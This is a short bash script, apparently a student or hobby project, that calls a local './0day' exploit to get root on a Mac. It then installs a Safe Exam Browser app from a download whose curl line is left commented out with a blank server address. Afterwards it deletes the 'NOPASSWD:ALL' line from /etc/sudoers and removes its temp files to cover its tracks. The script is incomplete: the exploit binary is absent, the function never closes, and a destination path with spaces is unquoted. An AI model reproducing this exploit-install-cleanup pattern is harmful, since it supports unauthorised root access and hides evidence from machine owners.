#!/bin/bash


# Exploit the machine, install on the machine, then cleanup the machine

# Created by:
# Patrick Hart & Zachery Rayburn


function KeepSafe {
echo -e '\033[1mExploiting machine...\033[0m'
echo

#--- EXPLOIT THE MACHINE ---#
./0day
randomTMP=/tmp$$/
serverAddress=
curledFile=/tmp$$/

#--- CHECK FOR ROOT ---#
  if [[ $EUID -ne 0 ]]
  then
    echo -e "\033[1mFailed! No root!\033[0m"
    exit 1
  else
#--- MAKE A TEMPORARY DIRECTORY WITH UNIQUE PID ---#
    sudo mkdir -v $randomTMP

    echo;echo

#--- DOWNLOAD THE PACKAGE ---#
    echo -e "\033[1mcURLing Safe Exam...\033[0m"
    #sudo curl $serverAddress -o $curledFile
    echo -e "\033[1mDone.\033[0m"

    echo;echo

#--- INSTALL THE PACKAGE ---#
    echo -e "\033[1mInstalling packages...\033[0m"
    mv -f /$randomTMP/Safe\ Exam\ Browser.app /Applications/Safe Exam Browser.app
    echo -e "\033[1mDone.\033[0m"

    echo;echo

    echo -e "\033[1mCleaning up exploited machine...\033[0m"

    echo;echo

#--- REMOVE THE LINE GRANTING ROOT ACCESS ---#
    sudo sed -i "" "/NOPASSWD:ALL/d" /etc/sudoers
#--- REMOVE TEMPORARY DIRECTORY ---#
    echo -e "\033[1mRemoving temporary files and directories...\033[0m"
    echo -e "\033[1mRemoved: \033[0m"
    rm -rfv /tmp$$

    echo;echo

    echo -e "\033[1mCompleted successfully.\033[0m"
  fi
  exit 0
